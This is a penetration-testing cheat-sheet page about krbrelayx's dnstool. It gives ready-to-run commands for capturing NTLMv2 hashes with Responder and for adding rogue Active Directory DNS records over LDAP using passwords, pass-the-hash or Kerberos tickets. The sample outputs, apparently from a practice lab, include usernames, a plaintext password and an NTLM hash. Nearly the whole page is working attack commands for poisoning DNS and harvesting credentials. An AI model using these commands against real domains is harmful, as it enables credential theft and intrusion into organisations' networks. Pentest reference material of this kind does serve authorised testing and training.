TLDRBins TLDRBins / Krbrelayx


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Authentication Method

Add Active Directory Integrated DNS records via LDAP

1. Capture NTLM Hash

sudo responder -I tun0
Sample Output: $ sudo responder -I tun0 ---[SNIP]--- [+] Listening for events... [HTTP] NTLMv2 Client : 10.10.10.248 [HTTP] NTLMv2 Username : intelligence\Ted.Graves [HTTP] NTLMv2 Hash : Ted.Graves::intelligence:d7c67a8c

2. Add a DNS Record

# Password python3 dnstool.py -u '<DOMAIN>\<USER>' -p '<PASSWORD>' --action add --record <TARGET_RECORD> --data <LOCAL_IP> <TARGET_IP>
Sample Output: $ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --action add --record web-test --data 10.10.14.31 10.10.10.248 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully
# NTLM python3 dnstool.py -u '<DOMAIN>\<USER>' -p ':<HASH>' --action add --record <TARGET_RECORD> --data <LOCAL_IP> <TARGET_IP>
Sample Output: $ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -p ':2B576ACBE6BCFDA7294D6BD18041B8FE' --action add --record web-test --data 10.10.14.31 10.10.10.248 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully
# Password-based Kerberos python3 dnstool.py -u '<DOMAIN>\<USER>' -p '<PASSWORD>' -k --action add --record <TARGET_RECORD> --data <LOCAL_IP> <TARGET_IP>
Sample Output: $ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -k --action add --record web-test --data 10.10.14.31 10.10.10.248 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully
# NTLM-based Kerberos python3 dnstool.py -u '<DOMAIN>\<USER>' -p ':<HASH>' -k --action add --record <TARGET_RECORD> --data <LOCAL_IP> <TARGET_IP>
Sample Output: $ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -p ':2B576ACBE6BCFDA7294D6BD18041B8FE' -k --action add --record web-test --data 10.10.14.31 10.10.10.248 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully
# Ticket-based Kerberos python3 dnstool.py -u '<DOMAIN>\<USER>' -k --action add --record <TARGET_RECORD> --data <LOCAL_IP> <TARGET_IP>
Sample Output: $ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -k --action add --record web-test --data 10.10.14.31 10.10.10.248 [-] Connecting to host... [-] Binding to host [+] Bind OK [-] Adding new record [+] LDAP operation completed successfully

Ref: krbrelayx tools